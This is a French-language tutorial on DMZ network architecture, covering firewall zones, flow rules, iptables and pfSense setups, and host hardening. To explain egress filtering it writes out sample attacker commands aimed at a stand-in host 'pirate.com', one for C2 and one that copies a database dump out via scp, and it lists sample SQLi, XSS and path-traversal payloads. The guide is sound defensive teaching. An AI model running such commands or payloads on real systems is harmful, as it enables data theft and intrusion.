Project Oxygen & Ideo-LabIDEO LAB Dashboard 2026

đŸ›Ąïž DMZ – Zone DĂ©militarisĂ©e, Architecture & SĂ©curitĂ©

Guide complet IDEO-Lab sur la conception de zones tampons sécurisées (Firewall).

1.1

Concept : DMZ

Zone Démilitarisée. Réseau tampon (buffer).

DMZ Sécurité Firewall
1.2

Concept : Zones de Confiance

Trust (LAN), Untrust (WAN), Semi-Trust (DMZ).

Zones Trust Untrust
1.3

Objectif : Isolation

Protéger le LAN si un serveur public est compromis.

Isolation Sécurité
2.1

Architecture : 1 Firewall

"3-Legged". Une interface WAN, LAN, DMZ.

3-Legged Architecture
2.2

Architecture : 2 Firewalls

"Back-to-back". Le standard (Haute Sécurité).

Back-to-back Défense en profondeur
2.3

Architecture : Cloud

VPC/VNet, Subnets (Public, DMZ, Private), SG/NACL.

Cloud VPC Security Group
3.1

RĂšgle : WAN -> DMZ

PERMIT (Sélectif). (DNAT/Port Fwd) vers 80/443.

Flux PERMIT DNAT
3.2

RĂšgle : DMZ -> WAN

DENY (Recommandé). (Bloque C2, Exfiltration).

Flux DENY
3.3

RĂšgle : LAN <-> DMZ

LAN -> DMZ (Permit). DMZ -> LAN (DENY !).

Flux DENY
4.1

Service : Serveurs Web

Nginx, Apache. (Hébergement public).

Web Server Nginx
4.2

Service : Relais Mail

SMTP Gateway (MTA). Filtre (Spam/Virus).

SMTP MTA
4.3

Service : DNS (Split-Brain)

Split-DNS (DNS Externe vs DNS Interne).

DNS Split-Brain
5.1

Service : Reverse Proxy

La DMZ "moderne". (Load Balancing, SSL Offload).

Reverse Proxy Load Balancer
5.2

Service : WAF

Web Application Firewall (Filtrage L7, OWASP).

WAF OWASP
5.3

Service : Bastion (Jump Host)

AccÚs Admin sécurisé (SSH/RDP Gateway).

Bastion Jump Host
6.1

Implémentation (iptables)

Linux (Netfilter). ChaĂźne FORWARD.

iptables FORWARD
6.2

Implémentation (Appliance)

pfSense, Fortinet, Palo Alto. (RĂšgles GUI).

pfSense Fortinet
6.3

Sécurité : Hardening

Sécurisation des hÎtes (Minimal, Patch, Logs).

Hardening HĂŽte
7.1

Cheat-sheet : Matrice de Flux

Tableau (Source -> Dest = Permit/Deny).

Checklist Matrice
1.1 Concept : DMZ (Zone Démilitarisée)
Le "No Man's Land" du Réseau

Une DMZ (Zone Démilitarisée) est un réseau "tampon" (buffer network), un sous-réseau physique ou logique, qui se situe entre un réseau interne de confiance (le LAN) et un réseau externe non-fiable (le WAN / Internet).

Objectif Principal

L'objectif est d'exposer des services publics (comme un serveur Web, Mail, ou DNS) Ă  Internet, tout en protĂ©geant le rĂ©seau interne (LAN) au cas oĂč l'un de ces services publics serait compromis (hackĂ©).

Analogie

C'est le "sas d'entrée" d'un chùteau fort :

  • LAN (Trust) : La cour intĂ©rieure, le donjon (oĂč vit le Roi). TrĂšs protĂ©gĂ©.
  • WAN (Untrust) : L'extĂ©rieur (la forĂȘt, les ennemis).
  • DMZ (Semi-Trust) : La "barbacane" ou la cour extĂ©rieure. C'est lĂ  que vous recevez les marchands (visiteurs publics). Si un marchand (trafic) se rĂ©vĂšle ĂȘtre un attaquant, il est piĂ©gĂ© dans la cour extĂ©rieure et ne peut pas atteindre le donjon (LAN).
1.2 Concept : Zones de Confiance

Un firewall ne pense pas en termes de "ports", il pense en termes de "Zones" (niveaux de confiance). La DMZ est la 3Ăšme zone fondamentale.

                                  ┌───────────────────────────┐
                                  │ FIREWALL                  │
                                  │                           │
(Zone 0 - UNTRUST)                │ (Interface WAN)           │
    INTERNET <───────────────────── eth0                      │
                                  │ (IP: 80.1.2.3)            │
                                  │                           │
                                  │ (Interface LAN)           │
RĂ©seau Interne (EmployĂ©s) <──────── eth1                      │
(Zone 100 - TRUST)                │ (IP: 192.168.1.1/24)      │
                                  │                           │
                                  │ (Interface DMZ)           │
Serveurs Publics (Web/Mail) <────── eth2                      │
(Zone 50 - SEMI-TRUST)            │ (IP: 172.16.1.1/24)       │
                                  │                           │
                                  └───────────────────────────┘

Le travail du firewall est ensuite d'écrire des rÚgles (ACLs) sur ce qui est autorisé à passer entre ces zones.

1.3 Objectif : Isolation & Réduction des Risques
Le Scénario Catastrophe (Sans DMZ)

Si vous hébergez votre serveur web (192.168.1.100) directement dans votre LAN (Trust), vous devez créer une rÚgle de Port Forwarding (NAT) : WAN (Port 443) -> 192.168.1.100.

Le ProblĂšme :

  1. Un pirate exploite une faille (ex: Injection SQL, Log4j) sur votre serveur web et obtient un shell.
  2. L'attaquant est directement dans votre réseau "Trust" (LAN).
  3. Il peut maintenant scanner (nmap) et pivoter pour attaquer :
    • Le serveur Active Directory (ContrĂŽleur de Domaine).
    • Le serveur de fichiers.
    • Le PC de la comptabilitĂ©.
La Solution (Avec DMZ)

Le serveur web est dans la DMZ (172.16.1.100). Si le pirate le compromet, il est piĂ©gĂ©. La rĂšgle du firewall DENY DMZ -> LAN (voir 4.1) l'empĂȘche de scanner ou d'atteindre le rĂ©seau interne.

2.1 Architecture : 1 Firewall ("3-Legged")

C'est l'architecture DMZ la plus courante (PME, SOHO). Elle utilise un seul firewall (Appliance ou Linux) avec (au moins) trois interfaces ("jambes").

                                  ┌───────────────────────────┐
                                  │ FIREWALL (1)              │
                                  │ (ex: pfSense)             │
                                  │                           │
(WAN)   INTERNET <───────────────── eth0 (WAN / Untrust)      │
                                  │                           │
(LAN)   RĂ©seau Interne <─────────── eth1 (LAN / Trust)        │
                                  │                           │
(DMZ)   Serveurs Publics <───────── eth2 (DMZ / Semi-Trust)   │
                                  │                           │
                                  └───────────────────────────┘
Avantages
  • CoĂ»t : Un seul appareil (firewall) Ă  acheter et Ă  gĂ©rer.
  • SimplicitĂ© : Toute la configuration (NAT, ACL, Routage) est centralisĂ©e sur un seul appareil.
Inconvénients
  • SPOF (Single Point of Failure) : Si le firewall tombe en panne, tout s'arrĂȘte (Internet, LAN, DMZ).
  • Risque de Configuration : Une seule erreur dans une rĂšgle ACL (ex: PERMIT DMZ -> LAN) compromet toute la sĂ©curitĂ©.
2.2 Architecture : 2 Firewalls ("Back-to-back")

C'est l'architecture haute sécurité (standard "Entreprise", "Défense en profondeur"). Elle utilise deux firewalls (souvent de marques différentes) pour créer la DMZ.

(WAN)
INTERNET
   │
   ▌
[ FW 1 (Externe) ]  <- "Le Firewall de Façade"
   │ (Interface DMZ)
   │
   ├─────────────────> [ Serveur Web (DMZ) ]
   │
   │
   ▌ (Interface "Interne")
[ FW 2 (Interne) ]  <- "Le Firewall du CƓur"
   │
   │
   ▌
[ LAN (Trust) ]

Le réseau entre les deux firewalls est la DMZ.

Avantages
  • DĂ©fense en Profondeur : L'attaquant doit compromettre deux firewalls (potentiellement de deux constructeurs diffĂ©rents) pour atteindre le LAN.
  • SpĂ©cialisation : FW 1 peut ĂȘtre un NGFW/WAF (orientĂ© Web), FW 2 peut ĂȘtre un pare-feu L3/L4 (orientĂ© flux internes).
Inconvénients
  • CoĂ»t : Double (matĂ©riel, licences).
  • ComplexitĂ© : Plus complexe Ă  configurer (routage, NAT).
2.3 Architecture : Cloud (VPC/VNet)

Dans le Cloud (AWS, Azure, GCP), le concept de DMZ est implémenté via la segmentation de sous-réseaux (Subnets) et des groupes de sécurité (Firewalls virtuels).

Architecture Type (AWS VPC)
[ INTERNET ]
     │
     ▌
[ Internet Gateway (IGW) ]
     │
     ▌
[ VPC (Réseau Cloud) ]
  ├─ [ Subnet Public (DMZ) ] ──────── (Route vers IGW)
  │    ├─ [ Load Balancer (ALB/NLB) ]
  │    └─ [ NAT Gateway ]
  │
  └─ [ Subnet PrivĂ© (LAN) ] ──────── (Route vers NAT GW)
       ├─ [ Serveur Web/App 1 ]
       ├─ [ Serveur Web/App 2 ]
       └─ [ Base de DonnĂ©es (RDS) ]
Filtrage (Firewalls Cloud)
  • NACL (Network ACL) : (Stateless) AppliquĂ© au Subnet. (ex: DENY SSH from ANY).
  • Security Group (SG) : (Stateful) AppliquĂ© Ă  l'Instance (VM). (ex: ALLOW TCP 443 from Load Balancer).

Ici, le "Subnet Public" (oĂč vit le Load Balancer) agit comme la DMZ.

3.1 RĂšgle de Flux : WAN -> DMZ (Entrant)

C'est la rÚgle qui autorise le public à accéder à vos serveurs. C'est la seule rÚgle "PERMIT" initiée depuis "Untrust".

Cette rĂšgle est toujours restrictive (Whitelist).

Implémentation (Port Forwarding / DNAT)

C'est une combinaison d'une rĂšgle DNAT (Port Forwarding) et d'une rĂšgle Firewall (ACL).

Exemple (Serveur Web)

RĂšgle DNAT (NAT Entrant) :

  • Trafic arrivant sur 80.1.2.3 (IP Publique) au port 443 (HTTPS)
  • ... est translatĂ© vers 172.16.1.10 (IP DMZ) au port 443.

RĂšgle Firewall (ACL) :

RĂšgle 1:
  Action: PERMIT
  Source: ANY (Internet)
  Destination: 172.16.1.10 (Serveur Web DMZ)
  Service: TCP 443 (HTTPS)

Bonne Pratique : Ne jamais faire PERMIT ANY -> ANY (DMZ). N'ouvrir que les ports explicitement nécessaires (80, 443, 25...).

3.2 RĂšgle de Flux : DMZ -> WAN (Sortant)
La RÚgle Souvent Oubliée

Que se passe-t-il si un serveur de la DMZ (ex: votre serveur web) est compromis ?

La premiĂšre chose que l'attaquant (malware) tentera de faire est :

  1. Contacter son serveur de Command & Control (C2) (ex: ssh pirate.com:2222) pour recevoir des ordres.
  2. Exfiltrer des données (ex: scp /data/db.dump pirate.com:/uploads/).
  3. Télécharger (curl, wget) d'autres outils malveillants.
La RÚgle : DENY par Défaut

Par dĂ©faut, la rĂšgle de flux DMZ -> WAN doit ĂȘtre DENY ALL (Implicit Deny).

Vous ne devez autoriser que les flux sortants explicitement nécessaires (Whitelist).

Exemple d'ACL (Sortant DMZ) :

RĂšgle 1: (Mises Ă  jour OS)
  PERMIT TCP [Serveur DMZ] -> [IP_Repo_Ubuntu] Port 80
RĂšgle 2: (RequĂȘtes DNS)
  PERMIT UDP [Serveur DMZ] -> [DNS 8.8.8.8] Port 53
RĂšgle 3: (Implicit Deny)
  DENY IP ANY ANY (log)
3.3 RĂšgle de Flux : LAN <-> DMZ
Flux LAN (Trust) -> DMZ (Semi-Trust)

Ce flux est gĂ©nĂ©ralement autorisĂ©, mais doit ĂȘtre restreint.

Exemple : Les administrateurs (dans le LAN) doivent pouvoir se connecter aux serveurs (dans la DMZ) pour les gérer.

Bonnes Pratiques (ACL) :

RĂšgle 1: (Admin)
  PERMIT TCP [IP_Admin_LAN] -> [Serveur_Web_DMZ] Port 22 (SSH)
RĂšgle 2: (Monitoring)
  PERMIT ICMP [Serveur_NMS_LAN] -> [Serveur_Web_DMZ] (Ping)
RĂšgle 3: (Refus du reste)
  DENY IP [LAN_Subnet] -> [DMZ_Subnet]
Flux DMZ (Semi-Trust) -> LAN (Trust)

LA RÈGLE LA PLUS IMPORTANTE : DENY ALL.

C'est le but principal de la DMZ. Un appareil dans la DMZ (ex: serveur web) ne doit JAMAIS ĂȘtre autorisĂ© Ă  initier une connexion vers le rĂ©seau interne (LAN).

L'Exception (Risquée) : Base de Données

Parfois, le Serveur Web (DMZ) doit contacter le Serveur de Base de Données (LAN).

RĂšgle 100: (Exception BDD)
  PERMIT TCP [IP_Web_DMZ] -> [IP_DB_LAN] Port 3306 (MySQL)

Risque : Si le serveur Web est compromis, l'attaquant peut "pivoter" vers le serveur de BDD. C'est pourquoi une architecture "Dual Firewall" (2.2) ou Cloud (2.3) (plaçant la BDD dans son propre segment "Privé") est préférable.

4.1 Service : Serveurs Web (HTTP/S)

C'est le cas d'usage le plus évident pour une DMZ.

Le serveur (Apache, Nginx, IIS) qui héberge le site web public (www.ideolab.com) est placé dans la DMZ.

Le firewall est configuré (via DNAT/Port Forwarding) pour transférer le trafic entrant TCP 80 (HTTP) et TCP 443 (HTTPS) vers l'IP privée de ce serveur.

(Voir "Reverse Proxy" (5.1) pour une architecture plus moderne oĂč le serveur Nginx/Apache est *lui-mĂȘme* le proxy).

4.2 Service : Relais Mail (SMTP Gateway)

Vous ne devez jamais exposer votre serveur de messagerie interne (ex: Microsoft Exchange) directement Ă  Internet.

La bonne pratique est de placer un Relais SMTP (SMTP Gateway / MTA) dans la DMZ (ex: Postfix, Sendmail, ou une appliance Anti-Spam).

Flux (Entrant)
  1. L'enregistrement MX (DNS) pointe vers l'IP publique du Relais SMTP (DMZ).
  2. Le firewall autorise TCP 25 (SMTP) de WAN -> DMZ.
  3. Le Relais (DMZ) reçoit l'email, le scanne (Anti-Spam, Anti-Virus).
  4. Le firewall autorise TCP 25 de DMZ -> LAN (Serveur Exchange).
  5. Le Relais transfĂšre l'email (propre) au serveur interne.
4.3 Service : Split-Brain DNS (DNS Scindé)

Le Split-Brain DNS (ou "Split-Horizon") est une architecture de sĂ©curitĂ© qui utilise deux serveurs DNS (ou plus) pour le mĂȘme domaine, avec des rĂ©ponses diffĂ©rentes selon l'origine de la requĂȘte (Interne ou Externe).

Le ProblĂšme

Un employé (LAN) veut accéder à intranet.ideolab.com. Si son PC utilise le DNS public (8.8.8.8), il reçoit l'IP publique (80.1.2.3). Son trafic doit "sortir" sur Internet pour "rentrer" (Hairpinning) -> Inefficace et pose des problÚmes de sécurité.

La Solution (DMZ & LAN)
  • Serveur DNS Externe (dans la DMZ) : (Autoritatif pour Internet)
    • www.ideolab.com -> 80.1.2.3 (IP Publique)
    • intranet.ideolab.com -> (N'existe pas)
  • Serveur DNS Interne (dans le LAN) : (UtilisĂ© par les employĂ©s via DHCP)
    • www.ideolab.com -> 172.16.1.10 (IP de la DMZ)
    • intranet.ideolab.com -> 192.168.1.50 (IP du LAN)
5.1 Service : Reverse Proxy (Moderne)

L'architecture DMZ "moderne" (surtout Cloud) ne contient souvent qu'un seul type de service : un Reverse Proxy (ex: Nginx, HAProxy, ou un Load Balancer Cloud).

Architecture (Proxy en DMZ)

Dans cette architecture, les serveurs d'application (Web, API) ne sont plus dans la DMZ. Ils sont déplacés dans le LAN (ou un segment "App"), qui est plus sécurisé.

[INTERNET]
   │
   ▌ (Port 443)
[ FIREWALL ]
   │
   │ (Rùgle : PERMIT WAN -> DMZ (Port 443))
   ▌
[ DMZ ]
  └─ [ Reverse Proxy (Nginx) ]
        │ (Ex: proxy_pass http://192.168.1.100)
        │
   │ (Rùgle : PERMIT DMZ -> LAN (Port 80))
   ▌
[ FIREWALL ]
   │
   ▌
[ LAN ]
  └─ [ Serveur Web 1 (192.168.1.100) ] (N'Ă©coute que sur le port 80)
Avantages
  • SSL Offloading : Le Nginx (DMZ) gĂšre le HTTPS. Le trafic DMZ -> LAN est en HTTP (simple).
  • Load Balancing : Le Nginx (DMZ) rĂ©partit la charge vers les serveurs du LAN.
  • SĂ©curitĂ© (WAF) : Le Nginx (DMZ) filtre les attaques L7.
  • Surface d'Attaque Minimale : Le LAN n'expose aucun port. Le seul appareil compromettable est le Reverse Proxy.
5.2 Service : WAF (Web Application Firewall)

Un WAF est un Firewall de Couche 7 (Application) conçu spécifiquement pour inspecter le trafic HTTP/HTTPS et bloquer les attaques applicatives (ex: OWASP Top 10).

Positionnement

Le WAF est toujours placé dans la DMZ (ou en amont, chez un prestataire Cloud comme Cloudflare).

Il agit comme un Reverse Proxy. Il déchiffre (SSL Offload) le trafic, l'inspecte, puis (s'il est légitime) le re-chiffre (optionnel) et l'envoie au serveur web.

Ce qu'il bloque
  • Injections SQL (SQLi) : (ex: ' OR 1=1)
  • Cross-Site Scripting (XSS) : (ex: <script>alert(1)</script>)
  • Path Traversal : (ex: /etc/passwd)
  • Bot & Scanners : (ex: Blocage par User-Agent, IP rĂ©putĂ©e)
5.3 Service : Bastion (Jump Host)

ProblĂšme : Comment administrer (SSH, RDP) les serveurs dans la DMZ de maniĂšre sĂ©curisĂ©e ? Ouvrir les ports SSH/RDP de tous les serveurs DMZ Ă  Internet (ou mĂȘme au LAN) est une surface d'attaque Ă©norme.

La Solution : Le Bastion

Un Bastion (ou Jump Host / Jump Server) est un unique serveur, placé dans la DMZ, ultra-sécurisé (hardened), qui sert de point d'entrée unique pour l'administration.

Architecture & Flux
RĂšgles Firewall (Admin) :
1. PERMIT TCP [IP_Admin_WAN] -> [IP_Bastion_DMZ] (Port 22/SSH)
2. DENY TCP [IP_Admin_WAN] -> [Serveur_Web_DMZ] (Port 22) (Bloqué)
3. PERMIT TCP [IP_Bastion_DMZ] -> [Serveur_Web_DMZ] (Port 22)
  1. L'Admin (Maison) se connecte en SSH au Bastion (ssh admin@bastion.ideolab.com).
  2. (Le Bastion doit ĂȘtre ultra-sĂ©curisĂ© : MFA, Fail2Ban, ClĂ©s SSH uniquement).
  3. Une fois sur le Bastion, l'admin "saute" (jump) en SSH vers le serveur web (ssh web@172.16.1.10).

Avantages : Surface d'attaque minimisée (1 port SSH ouvert), et tout l'audit (logs) est centralisé sur le Bastion.

6.1 Implémentation (Linux iptables)

Configurer une DMZ "3-Legged" sur un serveur Linux (Netfilter) se fait principalement via la chaĂźne FORWARD (routage) de la table filter.

# Interfaces:
# eth0 = WAN (Internet)
# eth1 = LAN (Trust - 192.168.1.0/24)
# eth2 = DMZ (Semi-Trust - 172.16.1.0/24)

# 1. Activer le routage (IP Forwarding)
sysctl -w net.ipv4.ip_forward=1

# 2. Politique par défaut : TOUT BLOQUER (Sécurité)
iptables -P FORWARD DROP

# 3. Autoriser le trafic établi (Stateful)
iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

# 4. Autoriser LAN -> WAN (Sortie Internet)
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

# 5. Autoriser WAN -> DMZ (Serveur Web 172.16.1.10)
iptables -A FORWARD -i eth0 -o eth2 -d 172.16.1.10 -p tcp --dport 443 -j ACCEPT

# 6. Autoriser LAN -> DMZ (Admin SSH)
iptables -A FORWARD -i eth1 -o eth2 -d 172.16.1.10 -p tcp --dport 22 -j ACCEPT

# 7. RĂšgle DMZ -> LAN (DENY)
# (Inutile, car la politique par défaut est DROP, mais explicite)
iptables -A FORWARD -i eth2 -o eth1 -j DROP
6.2 Implémentation (Appliance GUI - pfSense)

Sur une appliance firewall (pfSense, Fortinet, Palo Alto), la configuration est graphique et basée sur les Zones/Interfaces.

Assignation des Interfaces (Zones)
  • WAN : eth0
  • LAN : eth1
  • DMZ : eth2 (ou OPT1)
RĂšgles de Firewall (Logique)

Les rÚgles sont appliquées sur l'interface entrante (Inbound).

RĂšgles sur l'interface WAN (Untrust) :

1. PERMIT TCP Source:ANY Dest:[IP_WEB_DMZ] Port:443 (DNAT)
2. (Implicit DENY ALL)

RĂšgles sur l'interface LAN (Trust) :

1. PERMIT IP Source:[LAN_Subnet] Dest:ANY (Autorise LAN -> WAN/DMZ)
2. (Implicit DENY ALL)

RĂšgles sur l'interface DMZ (Semi-Trust) :

1. PERMIT UDP Source:[DMZ_Subnet] Dest:[IP_DNS_Public] Port:53 (Autorise DNS)
2. PERMIT TCP Source:[DMZ_Subnet] Dest:[IP_Repo_Ubuntu] Port:80 (Mises Ă  jour)
3. (Implicit DENY ALL)  <-- Bloque DMZ -> LAN
6.3 Sécurité : Hardening (Durcissement) des HÎtes DMZ

La DMZ isole, mais ne protĂšge pas le serveur lui-mĂȘme. Les serveurs dans la DMZ sont les plus exposĂ©s et doivent ĂȘtre "durcis" (hardened).

Checklist de Hardening
  • Installation Minimale : N'installez que les services nĂ©cessaires (ex: Nginx). Pas d'interface graphique (GUI), pas d'outils inutiles.
  • Patch Management : Appliquer les mises Ă  jour de sĂ©curitĂ© (OS, Nginx, PHP) immĂ©diatement (ex: unattended-upgrades).
  • Firewall HĂŽte (HIDS) : Activer le firewall local (UFW, iptables) en plus du firewall rĂ©seau. (DĂ©fense en profondeur).
  • Moindre PrivilĂšge : Faire tourner le service (Nginx) avec un utilisateur non-root (ex: www-data).
  • DĂ©sactiver les services : (systemctl disable ...) Tout ce qui n'est pas Nginx/SSH.
  • AccĂšs SSH :
    • DĂ©sactiver l'authentification par mot de passe (PasswordAuthentication no).
    • N'autoriser que l'authentification par clĂ© SSH.
    • Limiter (AllowUsers) l'accĂšs aux admins.
  • Monitoring & Logs : Envoyer tous les logs (auth.log, nginx.log) Ă  un SIEM (Syslog) centralisĂ© (voir 7.1).
7.1 Cheat-sheet : Matrice de Flux DMZ (Par Défaut)

C'est la "logique" par défaut que 99% des firewalls doivent implémenter pour une DMZ sécurisée.

De (Source)Vers (Destination)Politique par DéfautExceptions (Exemples de PERMIT)
LAN (Trust)WAN (Untrust)PERMIT(Trafic web sortant des utilisateurs).
LAN (Trust)DMZDENY (Bonne pratique)PERMIT TCP (Admin) -> (Serveurs DMZ) Port 22/3389.
PERMIT ICMP (Monitoring) -> (Serveurs DMZ).
WAN (Untrust)LAN (Trust)DENY (Implicit)(Normalement jamais, sauf VPN Client-to-Site).
WAN (Untrust)DMZDENY (Implicit)(Port Forwarding)
PERMIT TCP -> (Serveur Web) Port 443.
PERMIT TCP -> (Relais Mail) Port 25.
DMZLAN (Trust)DENY (LA RÈGLE CLÉ)(L'exception risquĂ©e : PERMIT TCP (Web) -> (BDD LAN) Port 3306).
DMZWAN (Untrust)DENY (Bonne pratique)PERMIT TCP -> (Repo Ubuntu) Port 80 (Mises Ă  jour).
PERMIT UDP -> (DNS Public) Port 53.